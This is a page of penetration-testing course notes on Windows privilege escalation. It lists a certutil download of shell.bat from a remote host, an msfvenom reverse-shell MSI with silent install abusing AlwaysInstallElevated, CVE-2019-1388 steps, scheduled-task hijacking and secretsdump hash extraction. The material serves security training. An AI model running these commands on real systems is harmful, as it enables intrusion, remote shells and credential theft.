25.Miscellaneous-techniques

LOLBAS - certutil.exe

certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat
certutil -encode file1 encodedfile
certutil -decode encodedfile file2

Always Install Elevated

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi
msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart

Scheduled Tasks

schtasks /query /fo LIST /v
Get-ScheduledTask | select TaskName,State
.\accesschk64.exe /accepteula -s -d C:\Scripts\

User/Computer Description Field

Get-LocalUser
Get-WmiObject -Class Win32_OperatingSystem | select Description

Mount VHDX/VMDK (Linux)

guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmdk
guestmount --add WEBSRV10.vhdx  --ro /mnt/vhdx/ -m /dev/sda1

Retrieving Hashes (Linux)

secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL

1. Living Off The Land Binaries and Scripts (LOLBAS):

  • Concept: Using legitimate, Microsoft-signed binaries and scripts for malicious purposes.

  • Example: certutil.exe:

    • File transfer: certutil.exe -urlcache -split -f http://<IP>/file.exe file.exe

    • Base64 encoding: certutil -encode file1 encodedfile

    • Base64 decoding: certutil -decode encodedfile file2

  • rundll32.exe: Used to execute DLLs.

2. Always Install Elevated:

  • Vulnerability: If enabled, any MSI package can be installed with SYSTEM privileges.

  • Enumeration:

    • reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

    • reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

  • Exploitation:

    • Generate malicious MSI: msfvenom -p windows/shell_reverse_tcp lhost=<IP> lport=<PORT> -f msi > aie.msi

    • Execute: msiexec /i aie.msi /quiet /qn /norestart

3. CVE-2019-1388:

  • Vulnerability: Privilege escalation through the Windows Certificate Dialog.

  • Exploitation:

    • Run hhupd.exe as administrator.

    • Open certificate details.

    • Click the "Issued By" hyperlink.

    • Use "View page source" and "Save as" to launch cmd.exe as SYSTEM.

4. Scheduled Tasks:

  • Enumeration:

    • schtasks /query /fo LIST /v

    • PowerShell: Get-ScheduledTask | select TaskName,State

  • Exploitation:

    • If write permissions exist on task scripts or the task itself, modify them for malicious code execution.

    • Accesschk.exe to check folder permissions.

5. User/Computer Description Field:

  • Enumeration:

    • PowerShell: Get-LocalUser

    • PowerShell: Get-WmiObject -Class Win32_OperatingSystem | select Description

6. Mount VHDX/VMDK:

  • Technique: Mount virtual hard disk files to access their contents.

  • Linux:

    • VMDK: guestmount -a <VMDK_FILE> -i --ro /mnt/vmdk

    • VHD/VHDX: guestmount --add <VHDX_FILE> --ro /mnt/vhdx/ -m /dev/sda1

  • Windows:

    • Right-click and "Mount" or use Disk Management.

    • PowerShell: Mount-VHD

    • VMDK: Map Virtual Disk, VMWare workstation, or 7zip.

7. Retrieving Hashes using Secretsdump.py:

  • Technique: Extract password hashes from SAM, SECURITY, and SYSTEM registry hives.

  • Command: secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL

Key Commands and Tools:

  • certutil.exe

  • rundll32.exe

  • reg query

  • msfvenom

  • msiexec

  • schtasks

  • Get-ScheduledTask (PowerShell)

  • Get-LocalUser (PowerShell)

  • Get-WmiObject (PowerShell)

  • guestmount (Linux)

  • secretsdump.py (Impacket)

  • Accesschk.exe

Previous24.PillagingNext8.Dealing with End of Life Systems

Last updated